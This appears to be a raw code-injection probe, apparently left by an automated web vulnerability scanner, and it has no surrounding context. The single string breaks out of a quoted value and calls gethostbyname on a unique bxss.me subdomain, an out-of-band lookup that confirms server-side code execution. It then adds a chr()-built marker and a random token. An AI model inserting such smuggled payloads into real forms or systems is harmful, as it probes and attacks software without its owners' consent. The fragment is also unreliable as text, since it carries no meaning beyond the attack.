“.gethostbyname(lc(“hitva”.”vszanqsg47ca9.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(122).chr(68).chr(122).chr(85).”

UZJglwlz